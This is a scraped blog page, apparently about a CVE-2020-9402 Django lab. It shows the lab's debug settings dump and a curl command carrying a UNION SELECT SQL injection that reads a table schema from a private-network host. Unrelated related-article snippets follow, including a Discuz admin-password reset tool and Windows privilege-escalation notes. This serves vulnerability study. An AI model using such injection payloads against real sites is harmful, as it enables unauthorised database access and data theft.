<tr> <td>AUTHENTICATION_BACKENDS</td> <td class="code"><pre>['django.contrib.auth.backends.ModelBackend']</pre></td> </tr> <tr> <td>AUTH_PASSWORD_VALIDATORS</td> <td class="code"><pre>'********************'</pre></td> </tr> <tr> <td>AUTH_USER_MODEL</td> <td class="code"><pre>'auth.User'</pre></td> </tr> <tr> <td>BASE_DIR</td> <td class="code"><pre>'/root/django_cve_2020_9402'</pre></td> </tr> <tr> <td>CACHES</td> <td class="code"><pre>{'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'}}</pre></td> </tr> <tr> <td>CACHE_MIDDLEWARE_ALIAS</td> <td class="code"><pre>'default'</pre></td> </tr> <tr> <td>CACHE_MIDDLEWARE_KEY_PREFIX</td> <td class="code"><pre>'********************'</pre></td> </tr> <tr> <td>CACHE_MIDDLEWARE_SECONDS</td> <td class="code"><pre>600</pre></td> </tr> <tr> <td>CSRF_COOKIE_AGE</td> <td class="code"><pre>31449600</pre></td> </tr> <tr> <td>CSRF_COOKIE_DOMAIN</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>CSRF_COOKIE_HTTPONLY</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>CSRF_COOKIE_NAME</td> <td class="code"><pre>'csrftoken'</pre></td> </tr> <tr> <td>CSRF_COOKIE_PATH</td> <td class="code"><pre>'/'</pre></td> </tr> <tr> <td>CSRF_COOKIE_SAMESITE</td> <td class="code"><pre>'Lax'</pre></td> </tr> <tr> <td>CSRF_COOKIE_SECURE</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>CSRF_FAILURE_VIEW</td> <td class="code"><pre>'django.views.csrf.csrf_failure'</pre></td> </tr> <tr> <td>CSRF_HEADER_NAME</td> <td class="code"><pre>'HTTP_X_CSRFTOKEN'</pre></td> </tr> <tr> <td>CSRF_TRUSTED_ORIGINS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>CSRF_USE_SESSIONS</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>DATABASES</td> <td class="code"><pre>{'default': {'ATOMIC_REQUESTS': False, 'AUTOCOMMIT': True, 'CONN_MAX_AGE': 0, 'ENGINE': 'django.db.backends.sqlite3', 'HOST': '', 'NAME': '/root/django_cve_2020_9402/db.sqlite3', 'OPTIONS': {}, 'PASSWORD': '********************', 'PORT': '', 'TEST': {'CHARSET': None, 'COLLATION': None, 'MIRROR': None, 'NAME': None}, 'TIME_ZONE': None, 'USER': ''}}</pre></td> </tr> <tr> <td>DATABASE_ROUTERS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>DATA_UPLOAD_MAX_MEMORY_SIZE</td> <td class="code"><pre>2621440</pre></td> </tr> <tr> <td>DATA_UPLOAD_MAX_NUMBER_FIELDS</td> <td class="code"><pre>1000</pre></td> </tr> <tr> <td>DATETIME_FORMAT</td> <td class="code"><pre>'N j, Y, P'</pre></td> </tr> <tr> <td>DATETIME_INPUT_FORMATS</td> <td class="code"><pre>['%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M:%S.%f', '%Y-%m-%d %H:%M', '%Y-%m-%d', '%m/%d/%Y %H:%M:%S', '%m/%d/%Y %H:%M:%S.%f', '%m/%d/%Y %H:%M', '%m/%d/%Y', '%m/%d/%y %H:%M:%S', '%m/%d/%y %H:%M:%S.%f', '%m/%d/%y %H:%M', '%m/%d/%y']</pre></td> </tr> <tr> <td>DATE_FORMAT</td> <td class="code"><pre>'N j, Y'</pre></td> </tr> <tr> <td>DATE_INPUT_FORMATS</td> <td class="code"><pre>['%Y-%m-%d', '%m/%d/%Y', '%m/%d/%y', '%b %d %Y', '%b %d, %Y', '%d %b %Y', '%d %b, %Y', '%B %d %Y', '%B %d, %Y', '%d %B %Y', '%d %B, %Y']</pre></td> </tr> <tr> <td>DEBUG</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>DEBUG_PROPAGATE_EXCEPTIONS</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>DECIMAL_SEPARATOR</td> <td class="code"><pre>'.'</pre></td> </tr> <tr> <td>DEFAULT_CHARSET</td> <td class="code"><pre>'utf-8'</pre></td> </tr> <tr> <td>DEFAULT_EXCEPTION_REPORTER_FILTER</td> <td class="code"><pre>'django.views.debug.SafeExceptionReporterFilter'</pre></td> </tr> <tr> <td>DEFAULT_FILE_STORAGE</td> <td class="code"><pre>'django.core.files.storage.FileSystemStorage'</pre></td> </tr> <tr> <td>DEFAULT_FROM_EMAIL</td> <td class="code"><pre>'webmaster@localhost'</pre></td> </tr> <tr> <td>DEFAULT_INDEX_TABLESPACE</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>DEFAULT_TABLESPACE</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>DISALLOWED_USER_AGENTS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>EMAIL_BACKEND</td> <td class="code"><pre>'django.core.mail.backends.smtp.EmailBackend'</pre></td> </tr> <tr> <td>EMAIL_HOST</td> <td class="code"><pre>'localhost'</pre></td> </tr> <tr> <td>EMAIL_HOST_PASSWORD</td> <td class="code"><pre>'********************'</pre></td> </tr> <tr> <td>EMAIL_HOST_USER</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>EMAIL_PORT</td> <td class="code"><pre>25</pre></td> </tr> <tr> <td>EMAIL_SSL_CERTFILE</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>EMAIL_SSL_KEYFILE</td> <td class="code"><pre>'********************'</pre></td> </tr> <tr> <td>EMAIL_SUBJECT_PREFIX</td> <td class="code"><pre>'[Django] '</pre></td> </tr> <tr> <td>EMAIL_TIMEOUT</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>EMAIL_USE_LOCALTIME</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>EMAIL_USE_SSL</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>EMAIL_USE_TLS</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>FILE_CHARSET</td> <td class="code"><pre>'utf-8'</pre></td> </tr> <tr> <td>FILE_UPLOAD_DIRECTORY_PERMISSIONS</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>FILE_UPLOAD_HANDLERS</td> <td class="code"><pre>['django.core.files.uploadhandler.MemoryFileUploadHandler', 'django.core.files.uploadhandler.TemporaryFileUploadHandler']</pre></td> </tr> <tr> <td>FILE_UPLOAD_MAX_MEMORY_SIZE</td> <td class="code"><pre>2621440</pre></td> </tr> <tr> <td>FILE_UPLOAD_PERMISSIONS</td> <td class="code"><pre>420</pre></td> </tr> <tr> <td>FILE_UPLOAD_TEMP_DIR</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>FIRST_DAY_OF_WEEK</td> <td class="code"><pre>0</pre></td> </tr> <tr> <td>FIXTURE_DIRS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>FORCE_SCRIPT_NAME</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>FORMAT_MODULE_PATH</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>FORM_RENDERER</td> <td class="code"><pre>'django.forms.renderers.DjangoTemplates'</pre></td> </tr> <tr> <td>IGNORABLE_404_URLS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>INSTALLED_APPS</td> <td class="code"><pre>['django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'app']</pre></td> </tr> <tr> <td>INTERNAL_IPS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>LANGUAGES</td> <td class="code"><pre>[('af', 'Afrikaans'), ('ar', 'Arabic'), ('ast', 'Asturian'), ('az', 'Azerbaijani'), ('bg', 'Bulgarian'), ('be', 'Belarusian'), ('bn', 'Bengali'), ('br', 'Breton'), ('bs', 'Bosnian'), ('ca', 'Catalan'), ('cs', 'Czech'), ('cy', 'Welsh'), ('da', 'Danish'), ('de', 'German'), ('dsb', 'Lower Sorbian'), ('el', 'Greek'), ('en', 'English'), ('en-au', 'Australian English'), ('en-gb', 'British English'), ('eo', 'Esperanto'), ('es', 'Spanish'), ('es-ar', 'Argentinian Spanish'), ('es-co', 'Colombian Spanish'), ('es-mx', 'Mexican Spanish'), ('es-ni', 'Nicaraguan Spanish'), ('es-ve', 'Venezuelan Spanish'), ('et', 'Estonian'), ('eu', 'Basque'), ('fa', 'Persian'), ('fi', 'Finnish'), ('fr', 'French'), ('fy', 'Frisian'), ('ga', 'Irish'), ('gd', 'Scottish Gaelic'), ('gl', 'Galician'), ('he', 'Hebrew'), ('hi', 'Hindi'), ('hr', 'Croatian'), ('hsb', 'Upper Sorbian'), ('hu', 'Hungarian'), ('hy', 'Armenian'), ('ia', 'Interlingua'), ('id', 'Indonesian'), ('io', 'Ido'), ('is', 'Icelandic'), ('it', 'Italian'), ('ja', 'Japanese'), ('ka', 'Georgian'), ('kab', 'Kabyle'), ('kk', 'Kazakh'), ('km', 'Khmer'), ('kn', 'Kannada'), ('ko', 'Korean'), ('lb', 'Luxembourgish'), ('lt', 'Lithuanian'), ('lv', 'Latvian'), ('mk', 'Macedonian'), ('ml', 'Malayalam'), ('mn', 'Mongolian'), ('mr', 'Marathi'), ('my', 'Burmese'), ('nb', 'Norwegian Bokmål'), ('ne', 'Nepali'), ('nl', 'Dutch'), ('nn', 'Norwegian Nynorsk'), ('os', 'Ossetic'), ('pa', 'Punjabi'), ('pl', 'Polish'), ('pt', 'Portuguese'), ('pt-br', 'Brazilian Portuguese'), ('ro', 'Romanian'), ('ru', 'Russian'), ('sk', 'Slovak'), ('sl', 'Slovenian'), ('sq', 'Albanian'), ('sr', 'Serbian'), ('sr-latn', 'Serbian Latin'), ('sv', 'Swedish'), ('sw', 'Swahili'), ('ta', 'Tamil'), ('te', 'Telugu'), ('th', 'Thai'), ('tr', 'Turkish'), ('tt', 'Tatar'), ('udm', 'Udmurt'), ('uk', 'Ukrainian'), ('ur', 'Urdu'), ('uz', 'Uzbek'), ('vi', 'Vietnamese'), ('zh-hans', 'Simplified Chinese'), ('zh-hant', 'Traditional Chinese')]</pre></td> </tr> <tr> <td>LANGUAGES_BIDI</td> <td class="code"><pre>['he', 'ar', 'fa', 'ur']</pre></td> </tr> <tr> <td>LANGUAGE_CODE</td> <td class="code"><pre>'en-us'</pre></td> </tr> <tr> <td>LANGUAGE_COOKIE_AGE</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>LANGUAGE_COOKIE_DOMAIN</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>LANGUAGE_COOKIE_HTTPONLY</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>LANGUAGE_COOKIE_NAME</td> <td class="code"><pre>'django_language'</pre></td> </tr> <tr> <td>LANGUAGE_COOKIE_PATH</td> <td class="code"><pre>'/'</pre></td> </tr> <tr> <td>LANGUAGE_COOKIE_SAMESITE</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>LANGUAGE_COOKIE_SECURE</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>LOCALE_PATHS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>LOGGING</td> <td class="code"><pre>{}</pre></td> </tr> <tr> <td>LOGGING_CONFIG</td> <td class="code"><pre>'logging.config.dictConfig'</pre></td> </tr> <tr> <td>LOGIN_REDIRECT_URL</td> <td class="code"><pre>'/accounts/profile/'</pre></td> </tr> <tr> <td>LOGIN_URL</td> <td class="code"><pre>'/accounts/login/'</pre></td> </tr> <tr> <td>LOGOUT_REDIRECT_URL</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>MANAGERS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>MEDIA_ROOT</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>MEDIA_URL</td> <td class="code"><pre>''</pre></td> </tr> <tr> <td>MESSAGE_STORAGE</td> <td class="code"><pre>'django.contrib.messages.storage.fallback.FallbackStorage'</pre></td> </tr> <tr> <td>MIDDLEWARE</td> <td class="code"><pre>['django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware']</pre></td> </tr> <tr> <td>MIGRATION_MODULES</td> <td class="code"><pre>{}</pre></td> </tr> <tr> <td>MONTH_DAY_FORMAT</td> <td class="code"><pre>'F j'</pre></td> </tr> <tr> <td>NUMBER_GROUPING</td> <td class="code"><pre>0</pre></td> </tr> <tr> <td>PASSWORD_HASHERS</td> <td class="code"><pre>'********************'</pre></td> </tr> <tr> <td>PASSWORD_RESET_TIMEOUT_DAYS</td> <td class="code"><pre>'********************'</pre></td> </tr> <tr> <td>PREPEND_WWW</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>ROOT_URLCONF</td> <td class="code"><pre>'vuln.urls'</pre></td> </tr> <tr> <td>SECRET_KEY</td> <td class="code"><pre>'********************'</pre></td> </tr> <tr> <td>SECURE_BROWSER_XSS_FILTER</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>SECURE_CONTENT_TYPE_NOSNIFF</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>SECURE_HSTS_INCLUDE_SUBDOMAINS</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>SECURE_HSTS_PRELOAD</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>SECURE_HSTS_SECONDS</td> <td class="code"><pre>0</pre></td> </tr> <tr> <td>SECURE_PROXY_SSL_HEADER</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>SECURE_REDIRECT_EXEMPT</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>SECURE_REFERRER_POLICY</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>SECURE_SSL_HOST</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>SECURE_SSL_REDIRECT</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>SERVER_EMAIL</td> <td class="code"><pre>'root@localhost'</pre></td> </tr> <tr> <td>SESSION_CACHE_ALIAS</td> <td class="code"><pre>'default'</pre></td> </tr> <tr> <td>SESSION_COOKIE_AGE</td> <td class="code"><pre>1209600</pre></td> </tr> <tr> <td>SESSION_COOKIE_DOMAIN</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>SESSION_COOKIE_HTTPONLY</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>SESSION_COOKIE_NAME</td> <td class="code"><pre>'sessionid'</pre></td> </tr> <tr> <td>SESSION_COOKIE_PATH</td> <td class="code"><pre>'/'</pre></td> </tr> <tr> <td>SESSION_COOKIE_SAMESITE</td> <td class="code"><pre>'Lax'</pre></td> </tr> <tr> <td>SESSION_COOKIE_SECURE</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>SESSION_ENGINE</td> <td class="code"><pre>'django.contrib.sessions.backends.db'</pre></td> </tr> <tr> <td>SESSION_EXPIRE_AT_BROWSER_CLOSE</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>SESSION_FILE_PATH</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>SESSION_SAVE_EVERY_REQUEST</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>SESSION_SERIALIZER</td> <td class="code"><pre>'django.contrib.sessions.serializers.JSONSerializer'</pre></td> </tr> <tr> <td>SETTINGS_MODULE</td> <td class="code"><pre>'vuln.settings'</pre></td> </tr> <tr> <td>SHORT_DATETIME_FORMAT</td> <td class="code"><pre>'m/d/Y P'</pre></td> </tr> <tr> <td>SHORT_DATE_FORMAT</td> <td class="code"><pre>'m/d/Y'</pre></td> </tr> <tr> <td>SIGNING_BACKEND</td> <td class="code"><pre>'django.core.signing.TimestampSigner'</pre></td> </tr> <tr> <td>SILENCED_SYSTEM_CHECKS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>STATICFILES_DIRS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>STATICFILES_FINDERS</td> <td class="code"><pre>['django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder']</pre></td> </tr> <tr> <td>STATICFILES_STORAGE</td> <td class="code"><pre>'django.contrib.staticfiles.storage.StaticFilesStorage'</pre></td> </tr> <tr> <td>STATIC_ROOT</td> <td class="code"><pre>None</pre></td> </tr> <tr> <td>STATIC_URL</td> <td class="code"><pre>'/static/'</pre></td> </tr> <tr> <td>TEMPLATES</td> <td class="code"><pre>[{'APP_DIRS': True, 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'OPTIONS': {'context_processors': ['django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages']}}]</pre></td> </tr> <tr> <td>TEST_NON_SERIALIZED_APPS</td> <td class="code"><pre>[]</pre></td> </tr> <tr> <td>TEST_RUNNER</td> <td class="code"><pre>'django.test.runner.DiscoverRunner'</pre></td> </tr> <tr> <td>THOUSAND_SEPARATOR</td> <td class="code"><pre>','</pre></td> </tr> <tr> <td>TIME_FORMAT</td> <td class="code"><pre>'P'</pre></td> </tr> <tr> <td>TIME_INPUT_FORMATS</td> <td class="code"><pre>['%H:%M:%S', '%H:%M:%S.%f', '%H:%M']</pre></td> </tr> <tr> <td>TIME_ZONE</td> <td class="code"><pre>'UTC'</pre></td> </tr> <tr> <td>USE_I18N</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>USE_L10N</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>USE_THOUSAND_SEPARATOR</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>USE_TZ</td> <td class="code"><pre>True</pre></td> </tr> <tr> <td>USE_X_FORWARDED_HOST</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>USE_X_FORWARDED_PORT</td> <td class="code"><pre>False</pre></td> </tr> <tr> <td>WSGI_APPLICATION</td> <td class="code"><pre>'vuln.wsgi.application'</pre></td> </tr> <tr> <td>X_FRAME_OPTIONS</td> <td class="code"><pre>'DENY'</pre></td> </tr> <tr> <td>YEAR_MONTH_FORMAT</td> <td class="code"><pre>'F Y'</pre></td> </tr> </tbody> </table> </div> <div id="explanation"> <p> You're seeing this error because you have <code>DEBUG = True</code> in your Django settings file. Change that to <code>False</code>, and Django will display a standard page generated by the handler for this status code. </p> </div> </body> </html>
最新发布
12-01
curl -H "Host: localhost" "http://192.168.20.128:8000/?id=1%27%20union%20select%20sql,%27x%27%20from%20sqlite_master%20where%20name=%27app_userinfo%27--" ``` --- ## ️ 修复建议(开发者视角) 不要...
dz论坛使用tools修改创始人密码
爱分享的小可爱
03-18 1650
把下面是代码的代码内容复制然后创建一个php文件粘贴进去然后访问 【登录密码是Zz123456 也可以自己修改】 <?php /** * [Discuz!] (C)2001-2099 Comsenz Inc. * This is NOT a freeware, use is subject to license terms * * $Id: tools.php 111 2013-03-18 02:43:43Z xujiakun $ */ /** *.
实践练习2:手动部署 OceanBase社区版 集群(离线部署)
qinwen740的博客
03-24 2170
部署规划 本文实践练习手动部署 OceanBase 集群副本的方法,3台OceanBase 节点上部署启动 observer 进程,并在中控机上部署 obproxy 进程。 机器信息 机器类型 虚拟机 IP 10.201.0.170, 10.201.0.171, 10.201.0.172, 10.201.0.173 网卡名 eth0 OS CentOS Linux release 7.9.2009 CPU 4C 内存 总内存 16G,可用内存 1
discuz3.4升级3.5问题汇总
yuanbintb的博客
08-13 1591
还有一些用户名开头包含空白字符,在转成utf8mb4_unicode_ci排序规则的字段时,会自动去掉前面的空白符号,如果有不含空白符的同名用户,也会唯一索引报错。上传 UCenter 1.7.0 程序(压缩包中 upload/uc_server 目录中的文件,如使用 FTP 上传请使用二进制模式), 如上传时候提示覆盖目录,请选择 “是”。再将异常用户改名,如果UC表查询无异常,上述语句中表名可以更换为(pre_common_member)和(pre_common_member_archive)
系统提权之:Windows 提权
f_carey的博客
11-04 3219
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Windows 提权1 利用漏洞提权1.1 手工查找系统缺失补丁1.2 Windows 补丁审计工具1.2.1 Windows-Exploit-Suggester1.2.2 Sherlock1.3 MSF 模块查找可利用漏洞2 利用 Windows 配置错误提权2.1 系统服务权限配置错误2.1.1 利用 Po.
解析mysql数据库还原错误:(mysql Error Code: 1005 errno 121)
09-10
本篇文章是对mysql数据库还原错误:(mysql Error Code: 1005 errno 121)的解决方法进行了详细的分析介绍,需要的朋友参考下
discuz 搬家出现UCenter info: MySQL Query ErrorSQL:SELECT value FROM [Table]vars WHERE name=‘noteexists‘
一颗优雅草科技-央千澈的优快云博客~只想无穷无尽的学习~作息早8-晚8
08-10 1174
UCenter info:MySQL Query ErrorSQL:SELECT value FROM [Table]vars WHERE name='noteexists'Error:Errno:0 discuz 搬家出现的,检查 config 的conf/config_ucenter.php 并无问题 最后发现是uc_server/data/config.inc.php 问题,此文件很容易被忽略。 解决! 不得不说,dz是越来越好用了,除开历史包袱 导致开发对id..
UCenter info: MySQL Query Error SQL:SELECT value FROM [Table]vars WHERE name=\'noteexists2′ Error:SELECT command denied to use
热门推荐
IT技术宅-北方的刀郎
03-21 1万+
大家先看下数据库权限问题,然后再进行如下操作。SQL:SELECT value FROM [Table]vars WHERE name='noteexists2′ UCenter info: MySQL Query Error SQL:SELECT value FROM [Table]vars WHERE name='noteexists2′ Error:SELECT command denied
QTP 自动化测试 之 SelectValuefromList
yinshuilan的专栏
08-15 370
List的属性是WebElement的时候使用Document来选择list里面的值 '------------------------------------------------------------------------------------------------------------------------ 'Function OBJ_Selec
ucenter info: mysql query error_处理UCenter info: MySQL Query Error报错教程
weixin_34549315的博客
01-19 2457
很多站长在使用Discuz! X3.4建站,经常因服务器价格昂贵而搬家出现以下报错,在遇到这个问题的时候第一时间联系到我们寻求帮助UCenter info: MySQL Query Error SQL:SELECT value FROM [Table]vars WHERE name='noteexists1' Error:SELECT command denied to user 'mysq245...
UCenter info: MySQL Query Error
梅阳博客
05-13 902
UCenter info: MySQL Query ErrorSQL:SELECT value FROM [Table]vars WHERE name='noteexists1'Error:Table 'ultrax.pre_ucenter_vars' doesn't existErrno:1146 问题:用户注册和用户登录不进去。   迁移discuz,原以为很简单,数据导出,数据导入...
dz论坛ucenter打不开mysql,Discuz! X3搬家后UCenter出现UCenter info: MySQL Query Error解决方案...
weixin_28901739的博客
03-18 461
Discuz! X3 X2.5论坛搬家后 登录UCenter出现报错:UCenter info: MySQL Query ErrorSQL:SELECT value FROM [Table]vars WHERE name='noteexists2'Error:No database selectedErrno:1146出现此错误是因为UCenter的数据库配置文件不对造成的。解决方法1. 请查...
select * from KHINFO where KHINFO_DZ not='null'
03-28
<think>好的,我现在要解决用户的问题:从KHINFO表中查询地址字段不为空的记录,使用的SQL语句是`select * from KHINFO where KHINFO_DZ is not null`。首先,我需要确认这个查询是否符合用户的需求,同时考虑可能的优化方法。 首先,用户的需求是获取地址不为空的记录,这个WHERE条件是正确的,因为`IS NOT NULL`会筛选出KHINFO_DZ列非空的行。不过,用户可能需要注意以下几点: 1. **性能问题**:如果KHINFO表的数据量很大,使用`SELECT *`可能会影响查询效率,尤其是当表中有很多列或者包含大字段(如TEXT或BLOB类型)时。应该建议用户明确指定需要的列,而不是使用通配符`*`,这样可以减少数据传输量和数据库的负载。例如,使用`SELECT id, name, KHINFO_DZ`等具体列名。 2. **索引使用**:如果KHINFO_DZ字段没有索引,查询可能会进行全表扫描,这在数据量大时会导致性能下降。检查该字段是否有索引,如果没有,可以考虑添加索引来优化查询速度。不过,需要注意的是,索引对于NULL值的处理可能因数据库系统而异,需要确认索引是否包含NULL值。 3. **NULL值的处理**:不同的数据库对NULL的判断可能有些差异,但标准的SQL中`IS NOT NULL`是正确的。需要确保用户使用的数据库(如MySQL、PostgreSQL等)在这个语法上没有特殊要求。 接下来,参考提供的引用内容,特别是引用[1]和引用[3],关于优化查询的方法: - 引用[1]提到使用`SELECT *`的优化,可能涉及只选择必要的列,减少数据传输。 - 引用[3]提到使用注释来排除某些子查询的影响,或者通过HINT调整执行计划,比如禁止变量改写,使用特定的JOIN方法。 因此,在优化用户的查询时,可以建议用户避免使用`SELECT *`,并为KHINFO_DZ字段添加索引。此外,如果查询仍然较慢,可能需要分析执行计划,看看是否有全表扫描的情况,并考虑使用数据库特定的HINT来优化JOIN操作或执行计划。 另外,需要确认用户使用的数据库类型,因为不同的数据库(如MySQL、Oracle等)在索引和查询优化上可能有不同的建议。例如,在MySQL中,添加索引的语句是`CREATE INDEX idx_dz ON KHINFO(KHINFO_DZ);`,而在其他数据库中可能略有不同。 最后,确保用户的查询结果正确,即确实返回了所有地址不为空的记录。可以通过执行EXPLAIN或类似的语句来查看查询的执行计划,确认是否使用了索引,以及是否存在潜在的性能瓶颈。</think>要查询$KHINFO$表中地址字段$KHINFO\_DZ$不为空的记录,SQL语句可优化为: ```sql SELECT1,列2,... FROM KHINFO WHERE KHINFO_DZ IS NOT NULL ``` ### 分步说明 1. **避免全列查询** 用具体列名替代`SELECT *`,减少数据传输量。例如: ```sql SELECT id,name,KHINFO_DZ FROM KHINFO WHERE KHINFO_DZ IS NOT NULL ``` 2. **索引优化** 若表数据量较大,建议为$KHINFO\_DZ$字段创建索引: ```sql CREATE INDEX idx_dz ON KHINFO(KHINFO_DZ); ``` 该索引可使`IS NOT NULL`条件查询直接定位有效数据[^1] 3. **执行计划验证** 使用`EXPLAIN`分析查询路径,确认是否命中索引: ```sql EXPLAIN SELECT id,name FROM KHINFO WHERE KHINFO_DZ IS NOT NULL ``` ### 性能提升技巧 - **子查询优化**:若涉及复杂条件,可用`EXISTS`替代`IN`子句(参考引用[3]的HINT方法) - **分页处理**:大数据量场景建议添加`LIMIT`分页 - **字段注释**:用`/*+ INDEX(...) */`强制索引选择(Oracle适用)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

徐行致远

少侠,看你骨骼清奇,是个大善人

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值